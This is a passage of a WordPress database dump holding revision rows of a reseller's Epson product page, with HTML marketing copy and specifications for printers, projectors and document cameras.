eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:00:13','2019-09-25 09:00:13','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3454,1,'2019-09-25 17:01:00','2019-09-25 09:01:00','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:01:00','2019-09-25 09:01:00','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3455,1,'2019-09-25 17:01:31','2019-09-25 09:01:31','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, 